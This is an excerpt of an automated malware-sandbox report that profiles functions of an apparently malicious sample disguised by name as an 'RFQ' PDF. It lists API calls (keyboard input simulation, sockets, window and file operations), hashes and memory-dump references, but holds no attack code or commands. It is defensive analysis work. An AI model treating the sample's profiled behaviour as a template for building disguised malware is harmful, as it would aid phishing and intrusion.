                                                                                                                • Instruction Fuzzy Hash: 211190756002056BDF14AFA48D85FEE376AAF85314F048075FD099B2D2DF309A4ACB60
                                                                                                                Function 00AD5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AD58C1
                                                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AD58EE
                                                                                                                • DrawMenuBar.USER32(?), ref: 00AD58FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                • Opcode ID: c30f1c6aa61ac2ed82afa782a4b7d6c14f8c59b4f2133754afecf6c23136ba44
                                                                                                                • Instruction ID: f820b4936ba6d394cc87b96b4c290f6c47402d28fcabcb4b17d6a1ab9c84769d
                                                                                                                • Opcode Fuzzy Hash: c30f1c6aa61ac2ed82afa782a4b7d6c14f8c59b4f2133754afecf6c23136ba44
                                                                                                                • Instruction Fuzzy Hash: F9018031900218EFDB219F65EC45BAEBBB9FF45361F10809AE84AD6251DB308A85DF21
                                                                                                                Function 00A9D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A9D3BF
                                                                                                                • FreeLibrary.KERNEL32 ref: 00A9D3E5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                • API String ID: 3013587201-2590602151
                                                                                                                • Opcode ID: 9f48c29b22fc413d3a731550c107f7ca667d2c40a9bd1da27714fa045e1e1c29
                                                                                                                • Instruction ID: 1484b084b5ccfae4093b8fb8917f92f2c0f6ba14a823163a8e407579ecab9525
                                                                                                                • Opcode Fuzzy Hash: 9f48c29b22fc413d3a731550c107f7ca667d2c40a9bd1da27714fa045e1e1c29
                                                                                                                • Instruction Fuzzy Hash: DEF0E532A06A22ABDF3557208C589AA73F4AF11B03BD58656FC03EA155DB20CDC5D692
                                                                                                                Function 00AA007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b410a2bbe47a3ebb61706ee3a16d461270967060950144bedd20f05f480ce361
                                                                                                                • Instruction ID: 2e7954ef77b9a4ce6a2a519e34c548d22988147bc4dfaef29da008e53356892e
                                                                                                                • Opcode Fuzzy Hash: b410a2bbe47a3ebb61706ee3a16d461270967060950144bedd20f05f480ce361
                                                                                                                • Instruction Fuzzy Hash: A2C14975A0020AAFDB14CFA8C898FAEB7B5FF49304F218598E505EB291D731ED45DB90
                                                                                                                Function 00A73E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1036877536-0
                                                                                                                • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                • Instruction ID: c4ad5317d99426fc2bfe4172d26eaae6d1741882d165386dc854785873ccf47e
                                                                                                                • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                • Instruction Fuzzy Hash: 7EA12772A003869FEB15DF18CC917AABBF4EF69350F15C26DE5999B281C3388982C751
                                                                                                                Function 00AC342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1998397398-0
                                                                                                                • Opcode ID: 10cc69e4fc5166fb57fbbe9c3927dc3cf142e201bd0bd411c5d2dd543107a424
                                                                                                                • Instruction ID: fba86a7f2ef2d5397fad70fa5b79b85066253846c76e2e05d91747030258d0c1
                                                                                                                • Opcode Fuzzy Hash: 10cc69e4fc5166fb57fbbe9c3927dc3cf142e201bd0bd411c5d2dd543107a424
                                                                                                                • Instruction Fuzzy Hash: 7FA1097A6042109FCB10DF28C585E2AB7E5FF89714F05885DF98A9B362DB31ED05CB92
                                                                                                                Function 00AA0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ADFC08,?), ref: 00AA05F0
                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ADFC08,?), ref: 00AA0608
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,00ADCC40,000000FF,?,00000000,00000800,00000000,?,00ADFC08,?), ref: 00AA062D
                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00AA064E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 314563124-0
                                                                                                                • Opcode ID: 16a8ffe01d0d1fe72a8469bb256327b07eecec0e57bc098e389f48255e0787ef
                                                                                                                • Instruction ID: 86ae54f72715b129443864b08401577e891555b87aef2b903e2aaaea48b4886e
                                                                                                                • Opcode Fuzzy Hash: 16a8ffe01d0d1fe72a8469bb256327b07eecec0e57bc098e389f48255e0787ef
                                                                                                                • Instruction Fuzzy Hash: 6D811D75A00109EFCB04DF94C984DEEB7B9FF89315F204559E516AB290DB71AE06CB60
                                                                                                                Function 00A81391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID:
                                                                                                                • API String ID: 269201875-0
                                                                                                                • Opcode ID: db8a0cf0444efa5a8e23d1dad607b904578cbd515fcc8a32decfa19843efbce8
                                                                                                                • Instruction ID: ec7e3a928c783f4424f34f57dc789b4f4d3cc0e898ed7e2966bbe504de34e497
                                                                                                                • Opcode Fuzzy Hash: db8a0cf0444efa5a8e23d1dad607b904578cbd515fcc8a32decfa19843efbce8
                                                                                                                • Instruction Fuzzy Hash: ED417BB1A00200ABDB257BFD9D45ABE3BBCFF45370F148225F419D6192E67488435761
                                                                                                                Function 00AD6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(0116F540,?), ref: 00AD62E2
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AD6315
                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AD6382
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: 01db9d50ab644afa7dc3e57cf50ad95b9e74d69af3b209bbce1cd6a704dd0610
                                                                                                                • Instruction ID: 0633656fbdaeb8bc8f07aff30727bc87ca6a4379aba9bdc81b6f5b5303507d83
                                                                                                                • Opcode Fuzzy Hash: 01db9d50ab644afa7dc3e57cf50ad95b9e74d69af3b209bbce1cd6a704dd0610
                                                                                                                • Instruction Fuzzy Hash: 18510A74A00209AFDB10DF68D9819AE7BB5EB55360F10865AF9269B391D730ED41CB90
                                                                                                                Function 00AC1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00AC1AFD
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1B0B
                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AC1B8A
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1B94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$socket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1881357543-0
                                                                                                                • Opcode ID: 30331c8a79cf4621910bb2622db207225f0c4410456eef1112e562b4fbc016df
                                                                                                                • Instruction ID: 6cf6b99f49cd0a322d14e9c5adfd7a70fb02cfac938abf63b8ef8fef450965aa
                                                                                                                • Opcode Fuzzy Hash: 30331c8a79cf4621910bb2622db207225f0c4410456eef1112e562b4fbc016df
                                                                                                                • Instruction Fuzzy Hash: 6E417F78600201AFE720AF24C986F2977E5AB85718F54845CF91A9F3D3D772ED42CB91
                                                                                                                Function 00A7B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a139270f4d37788c025b3b4f89b2bad037301bd368f709660e39153ba8b9d3ea
                                                                                                                • Instruction ID: d2dccdaad2677518009ad8c350e6ed42d06a8879c36224b1b225d274bf808d84
                                                                                                                • Opcode Fuzzy Hash: a139270f4d37788c025b3b4f89b2bad037301bd368f709660e39153ba8b9d3ea
                                                                                                                • Instruction Fuzzy Hash: AA410BB1A10704BFD724AF78CD41BAABBF9EB84710F10C52EF55ADB282D771994187A0
                                                                                                                Function 00AB56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AB5783
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00AB57A9
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AB57CE
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AB57FA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: ff0dca6203ee8d9ccf56eeea4fc79fee119f5f4e26d0aa19d4eadbba1f96b9d6
                                                                                                                • Instruction ID: eb0216109fa6427596486b11cb666f295522a0d55bc2699cb079858c9026d2b2
                                                                                                                • Opcode Fuzzy Hash: ff0dca6203ee8d9ccf56eeea4fc79fee119f5f4e26d0aa19d4eadbba1f96b9d6
                                                                                                                • Instruction Fuzzy Hash: 73413E39A00610DFCB11EF55C544A5DBBE5EF89720B188888E84A5F362CB35FD41DB91
                                                                                                                Function 00A7D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00A66D71,00000000,00000000,00A682D9,?,00A682D9,?,00000001,00A66D71,8BE85006,00000001,00A682D9,00A682D9), ref: 00A7D910
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A7D999
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A7D9AB
                                                                                                                • __freea.LIBCMT ref: 00A7D9B4
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: a25eda60c927b4c2d65599c01c6047007ed902e96eb012fd9e140f744181e0ea
                                                                                                                • Instruction ID: 900b39c66b24a4dccc1ab1329f1181693f554322f2f88b577a1210403cf16440
                                                                                                                • Opcode Fuzzy Hash: a25eda60c927b4c2d65599c01c6047007ed902e96eb012fd9e140f744181e0ea
                                                                                                                • Instruction Fuzzy Hash: E131AD72A0021AABDF25DFA4DC45EAE7BB5EF40310B158669FD09D7290EB35CD50CB90
                                                                                                                Function 00AD52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00AD5352
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD5375
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AD5382
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AD53A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3340791633-0
                                                                                                                • Opcode ID: 03b345c0d8fb4aaa7ddaf8633dfd1442c2bf5d65cc53a06df5931565a3139e31
                                                                                                                • Instruction ID: ca99a48c33a0d532782c9dc8d4de20e4dadca9074da84e7236d202d87a31ad9b
                                                                                                                • Opcode Fuzzy Hash: 03b345c0d8fb4aaa7ddaf8633dfd1442c2bf5d65cc53a06df5931565a3139e31
                                                                                                                • Instruction Fuzzy Hash: A031B034E55A08EFEB349B74CC25BE87775AB05390F984103FA229E3E1C7B49950EB41
                                                                                                                Function 00AAAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00AAABF1
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AAAC0D
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AAAC74
                                                                                                                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00AAACC6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 81d9bffd148b5c61b184e612eb9bdca2b9870c91d47e4d84d350d5bfd4c2ec98
                                                                                                                • Instruction ID: 22296b88f0f02e83c8625a4f7e615e0db09b99d7e5cf1d3d44703a0f566679d3
                                                                                                                • Opcode Fuzzy Hash: 81d9bffd148b5c61b184e612eb9bdca2b9870c91d47e4d84d350d5bfd4c2ec98
                                                                                                                • Instruction Fuzzy Hash: A131E530A406186FFB35CFA588087FA7BF6ABA6330F04821AE485931D1D3798985D752
                                                                                                                Function 00AD7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD769A
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AD7710
                                                                                                                • PtInRect.USER32(?,?,00AD8B89), ref: 00AD7720
                                                                                                                • MessageBeep.USER32(00000000), ref: 00AD778C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
